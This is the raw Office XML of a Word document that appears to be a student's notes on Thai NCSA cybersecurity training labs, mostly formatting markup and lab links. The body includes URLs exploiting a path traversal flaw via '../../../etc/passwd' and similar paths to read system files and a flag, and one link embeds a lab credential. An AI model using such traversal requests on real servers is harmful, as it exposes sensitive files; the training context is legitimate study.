          <wp:inline wp14:editId="6851EA2F" wp14:anchorId="108CC955">
            <wp:extent cx="3400425" cy="2400300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1937731173" name="drawing" title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731173" name="Picture 1937731173"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2009469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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="494C5B2E" w14:textId="0C84190E">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="R54a58b8be2e046ca">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88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http://34.87.107.155/index.php?page=./hello.txt</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink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4c5e55bd53f4438">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88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http://34.87.107.155/index.php?page=../../../etc/passwd</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink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544fd2aa5e845a4">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88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http://34.87.107.155/index.php?page=../../../etc/hosts</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink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8e68e4ff5444d6d">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88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http://34.87.107.155/index.php?page=../../../start.sh</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7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b57232b5a3644d8">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88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http://34.87.107.155/index.php?page=../../../tmp/flag.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="5F2E2CBF" w:rsidRDefault="5F2E2CBF" w14:paraId="639AAB77" w14:textId="330EE05C"/>
    <w:sectPr w:rsidRPr="00005F64" w:rsidR="00604A3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C2934"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B8B6CF0A"/>
    <w:lvl w:ilvl="0" w:tplc="30F46E08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46068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014"/>
    <w:rsid w:val="00005F64"/>
    <w:rsid w:val="00225264"/>
    <w:rsid w:val="00335736"/>
    <w:rsid w:val="003C22C0"/>
    <w:rsid w:val="00463A60"/>
    <w:rsid w:val="00557600"/>
    <w:rsid w:val="00594743"/>
    <w:rsid w:val="005E6830"/>
    <w:rsid w:val="00604A3A"/>
    <w:rsid w:val="006849D6"/>
    <w:rsid w:val="009E7758"/>
    <w:rsid w:val="00C51DF1"/>
    <w:rsid w:val="00CF2014"/>
    <w:rsid w:val="00EA159C"/>
    <w:rsid w:val="00F10187"/>
    <w:rsid w:val="0CF67242"/>
    <w:rsid w:val="0F1DC68D"/>
    <w:rsid w:val="108E3C11"/>
    <w:rsid w:val="13184C27"/>
    <w:rsid w:val="154DC1C9"/>
    <w:rsid w:val="18F58516"/>
    <w:rsid w:val="2D905955"/>
    <w:rsid w:val="2E995993"/>
    <w:rsid w:val="355B57F2"/>
    <w:rsid w:val="35AB4E17"/>
    <w:rsid w:val="36D225F6"/>
    <w:rsid w:val="3AED7C88"/>
    <w:rsid w:val="57583765"/>
    <w:rsid w:val="585B7887"/>
    <w:rsid w:val="58C959BC"/>
    <w:rsid w:val="5F2E2CBF"/>
    <w:rsid w:val="65954FD7"/>
    <w:rsid w:val="6ACA08DA"/>
    <w:rsid w:val="6C77E588"/>
    <w:rsid w:val="73B9A27F"/>
    <w:rsid w:val="7EEE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5B6B3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{94776429-4DCA-4D2A-AEB3-46CE44E89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2014"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00CF201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01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F2014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F2014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F2014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F201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F201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F201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F201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F201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F2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01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CF2014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CF201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201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F2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01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F2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0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0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0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play.mooc.ncsa.or.th/lab/45" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/51" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/63" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/67" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/69" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/75" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://storage.googleapis.com/secplayground-forensic/network%20lab/wpachallenge.tar.gz%20/" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/38" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/58" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/47" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/62" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/79" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/46" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/31" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/57" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/62" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2.xml" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/74?username=sa&amp;credential=JDM82XDVMcNI%5ewpdW7ZQ5" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/78" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://136.110.22.181/" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/61" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/80" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/77" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/23" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/59" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/76" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/30" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/71" TargetMode="External" Id="R72e5788b1537495a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1f.png" Id="rId558338152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/index.php" TargetMode="External" Id="Rc942cbc782ff4e11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/82" TargetMode="External" Id="Reccd2ccd34bb40e8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image.jpg" Id="rId2006076250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/83" TargetMode="External" Id="Ra6411beb44f94909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.jpg" Id="rId498278358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.jpg" Id="rId1148016571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.jpg" Id="rId269357898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/84" TargetMode="External" Id="R15cf1a864f0b4d96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.jpg" Id="rId1549898800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.jpg" Id="rId2070025049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/85" TargetMode="External" Id="R3e8d87f46a7a4756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.jpg" Id="rId2037046233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.jpg" Id="rId612636728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/86" TargetMode="External" Id="Rb0364a0ecf6e4d8e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.jpg" Id="rId1806258325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.jpg" Id="rId712365623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/88" TargetMode="External" Id="Rf1af97ae09704a2c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/89" TargetMode="External" Id="R12766a3b49664772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/90" TargetMode="External" Id="R7aeae8ecdeda44e1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.jpg" Id="rId424892035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/91" TargetMode="External" Id="Rc3eb113d9cf94e39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image20.png" Id="rId1273050922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/92" TargetMode="External" Id="R58c37021590245d3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.jpg" Id="rId1115365779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.jpg" Id="rId584723872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/93" TargetMode="External" Id="R037a08a56c024869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image21.png" Id="rId2146847503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/94" TargetMode="External" Id="R91fbcf12c1314c9a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image22.png" Id="rId1422696574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image23.png" Id="rId1393690692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image24.png" Id="rId1651200037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image25.png" Id="rId46976237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/95" TargetMode="External" Id="R89627b10854f4ee3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image26.png" Id="rId1683666469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/96" TargetMode="External" Id="Rebe07d79826043f1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.jpg" Id="rId1741813674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.jpg" Id="rId1792642855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.jpg" Id="rId459807279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.jpg" Id="rId423126111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/97" TargetMode="External" Id="R04d1725a7fba4c8d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image27.png" Id="rId754292193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/98" TargetMode="External" Id="Rdeef21efc2ac49ef" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image28.png" Id="rId261797032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/133" TargetMode="External" Id="Rb060cf7e7dd043f1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/139" TargetMode="External" Id="R9bdb3d4b1dfa416f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://34.87.33.35/" TargetMode="External" Id="R4e3a5ada997c4b13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://34.87.33.35/" TargetMode="External" Id="Re71c90dd5b174709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://34.87.33.35/" TargetMode="External" Id="R440e66bda2944dd9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://34.87.33.35/" TargetMode="External" Id="Rba92c8c5f8a64a4d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/144" TargetMode="External" Id="Rc4c7c6dc65164552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.jpg" Id="rId2009469702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://34.87.107.155/index.php?page=./hello.txt" TargetMode="External" Id="R54a58b8be2e046ca" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://34.87.107.155/index.php?page=../../../etc/passwd" TargetMode="External" Id="R14c5e55bd53f4438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://34.87.107.155/index.php?page=../../../etc/hosts" TargetMode="External" Id="R6544fd2aa5e845a4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://34.87.107.155/index.php?page=../../../start.sh" TargetMode="External" Id="R18e68e4ff5444d6d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://34.87.107.155/index.php?page=../../../tmp/flag.txt" TargetMode="External" Id="Rdb57232b5a3644d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5C6366E7A76F4984B3A5A6504322E9" ma:contentTypeVersion="14" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="a3449cfea8c0631cc94f1098ae9a4718">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="d533f0fc-f163-477f-8acf-134549be1267" xmlns:ns3="98adb9b5-38eb-425a-885a-e7a61ef25c68" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="cdca11dc0175e468279e462f0f4cba0c" ns2:_="" ns3:_="">
    <xsd:import namespace="d533f0fc-f163-477f-8acf-134549be1267"/>
    <xsd:import namespace="98adb9b5-38eb-425a-885a-e7a61ef25c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f0fc-f163-477f-8acf-134549be12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9c6419b-ba21-413d-80ff-ef762860b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db9b5-38eb-425a-885a-e7a61ef25c6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d8ca457-1ef6-424d-87ae-e33ef425153b}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="98adb9b5-38eb-425a-885a-e7a61ef25c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33f0fc-f163-477f-8acf-134549be1267">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="98adb9b5-38eb-425a-885a-e7a61ef25c68" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{34D2C0E0-AC47-4E2A-9FAB-4E968DCD3BBB}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F73D0328-BE8F-452F-B384-FDBC910AE831}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A79BC7DB-BFC7-4763-8AEB-46D683A76A6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Nanta JANPITAK</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>Nanta JANPITAK</lastModifiedBy>
  <revision>7</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-16T01:20:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-17T11:49:39.8038148Z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0x010100425C6366E7A76F4984B3A5A6504322E9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>